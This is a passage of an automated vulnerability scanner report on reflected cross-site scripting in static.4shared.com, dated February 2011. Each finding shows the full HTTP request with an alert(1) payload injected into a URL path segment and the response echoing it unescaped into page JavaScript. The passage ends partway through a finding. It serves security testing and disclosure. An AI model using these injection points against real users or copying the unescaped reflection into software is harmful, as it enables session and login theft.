1.130. http://static.4shared.com/images/bg14.png [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/images/bg14.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69174"-alert(1)-"fe2d06cbac0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/bg14.png69174"-alert(1)-"fe2d06cbac0 HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/bg14.png69174"-alert(1)-"fe2d06cbac0
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B7E590F3655F47E51A63A0676D1F9F48.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:43 GMT
Content-Length: 36189

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/bg14.png69174"-alert(1)-"fe2d06cbac0";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.131. http://static.4shared.com/images/bg14.png [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/images/bg14.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6264'-alert(1)-'af6c21a8655 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/bg14.pnge6264'-alert(1)-'af6c21a8655 HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/bg14.pnge6264'-alert(1)-'af6c21a8655
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B24B3093C32259E67836ACDB85D8EB90.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:46 GMT
Content-Length: 36189

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
inBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/images/bg14.pnge6264'-alert(1)-'af6c21a8655',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.132. http://static.4shared.com/images/facebook/login-button.png [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/images/facebook/login-button.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9d43'-alert(1)-'2d94fed6f85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imagesa9d43'-alert(1)-'2d94fed6f85/facebook/login-button.png HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /imagesa9d43'-alert(1)-'2d94fed6f85/facebook/login-button.png
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0825E79010969C2DD494F06A951ABE12.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:16 GMT
Content-Length: 36274

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
ypeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/imagesa9d43'-alert(1)-'2d94fed6f85/facebook/login-button.png',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
...[SNIP]...

1.133. http://static.4shared.com/images/facebook/login-button.png [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/images/facebook/login-button.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a64c"-alert(1)-"ffcb7e388af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images7a64c"-alert(1)-"ffcb7e388af/facebook/login-button.png HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images7a64c"-alert(1)-"ffcb7e388af/facebook/login-button.png
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5B2A45DC50C460E287C02F9C2D8C0CA2.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:15 GMT
Content-Length: 36274

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images7a64c"-alert(1)-"ffcb7e388af/facebook/login-button.png";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function f
...[SNIP]...

1.134. http://static.4shared.com/images/facebook/login-button.png [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/images/facebook/login-button.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d708"-alert(1)-"02fd9aad990 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/facebook7d708"-alert(1)-"02fd9aad990/login-button.png HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/facebook7d708"-alert(1)-"02fd9aad990/login-button.png
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=28CE1CB951BF35E4F350801829B3A789.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:21 GMT
Content-Length: 36274

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/facebook7d708"-alert(1)-"02fd9aad990/login-button.png";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback()
...[SNIP]...

1.135. http://static.4shared.com/images/facebook/login-button.png [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/images/facebook/login-button.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7e2a'-alert(1)-'b93b3b25a99 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/facebookc7e2a'-alert(1)-'b93b3b25a99/login-button.png HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/facebookc7e2a'-alert(1)-'b93b3b25a99/login-button.png
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1CDA84EF1885A06E33E68F4C21CF9CBB.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:22 GMT
Content-Length: 36263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
inBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/images/facebookc7e2a'-alert(1)-'b93b3b25a99/login-button.png',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}

...[SNIP]...

1.136. http://static.4shared.com/images/facebook/login-button.png [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/images/facebook/login-button.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9ec6"-alert(1)-"d0a9f28947d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/facebook/login-button.pnge9ec6"-alert(1)-"d0a9f28947d HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/facebook/login-button.pnge9ec6"-alert(1)-"d0a9f28947d
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E747ED2ED4DEE1341BDB3FC96D31DF00.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:27 GMT
Content-Length: 36274

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/facebook/login-button.pnge9ec6"-alert(1)-"d0a9f28947d";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.137. http://static.4shared.com/images/facebook/login-button.png [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/images/facebook/login-button.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42975'-alert(1)-'897d0811cbd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/facebook/login-button.png42975'-alert(1)-'897d0811cbd HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/facebook/login-button.png42975'-alert(1)-'897d0811cbd
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=CAD9E6ABC753B60901D63E4EC1A32FBB.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:28 GMT
Content-Length: 36263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
ed'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/images/facebook/login-button.png42975'-alert(1)-'897d0811cbd',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.138. http://static.4shared.com/images/googleW.png [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/images/googleW.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ef11'-alert(1)-'5db61d3c8f0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images7ef11'-alert(1)-'5db61d3c8f0/googleW.png HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images7ef11'-alert(1)-'5db61d3c8f0/googleW.png
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6E5166A483833DEBDA11B2001D34996B.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:11 GMT
Content-Length: 36193

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
ypeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/images7ef11'-alert(1)-'5db61d3c8f0/googleW.png',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

...[SNIP]...

1.139. http://static.4shared.com/images/googleW.png [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/images/googleW.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 393fb"-alert(1)-"ee3174caf07 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images393fb"-alert(1)-"ee3174caf07/googleW.png HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images393fb"-alert(1)-"ee3174caf07/googleW.png
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=532AA185B4FE1F95997702082EEC4FD9.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:10 GMT
Content-Length: 36193

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images393fb"-alert(1)-"ee3174caf07/googleW.png";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.140. http://static.4shared.com/images/googleW.png [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/images/googleW.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52211'-alert(1)-'a76ff3c0dcf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/googleW.png52211'-alert(1)-'a76ff3c0dcf HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/googleW.png52211'-alert(1)-'a76ff3c0dcf
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=DCD1FBB5E902668E4F5E01879268CDFB.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:17 GMT
Content-Length: 36193

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
ox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/images/googleW.png52211'-alert(1)-'a76ff3c0dcf',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.141. http://static.4shared.com/images/googleW.png [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/images/googleW.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41f6f"-alert(1)-"4a01f65d839 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/googleW.png41f6f"-alert(1)-"4a01f65d839 HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/googleW.png41f6f"-alert(1)-"4a01f65d839
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=019E23D2EE91E7EDD888FD32E0B169F3.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:15 GMT
Content-Length: 36204

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/googleW.png41f6f"-alert(1)-"4a01f65d839";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.142. http://static.4shared.com/images/icons/16x16/close.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/images/icons/16x16/close.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18658'-alert(1)-'469ef2caec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images18658'-alert(1)-'469ef2caec/icons/16x16/close.gif HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images18658'-alert(1)-'469ef2caec/icons/16x16/close.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FF19EE0C9918C614497B152DAE5FBD33.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:21 GMT
Content-Length: 36249

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
ypeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/images18658'-alert(1)-'469ef2caec/icons/16x16/close.gif',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();

...[SNIP]...

1.143. http://static.4shared.com/images/icons/16x16/close.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/images/icons/16x16/close.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44c1c"-alert(1)-"a0a1c09ce47 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images44c1c"-alert(1)-"a0a1c09ce47/icons/16x16/close.gif HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images44c1c"-alert(1)-"a0a1c09ce47/icons/16x16/close.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6F1B92C331007CBC25069E048B75DF96.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:20 GMT
Content-Length: 36243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images44c1c"-alert(1)-"a0a1c09ce47/icons/16x16/close.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedb
...[SNIP]...

1.144. http://static.4shared.com/images/icons/16x16/close.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/images/icons/16x16/close.gif

Issue detail

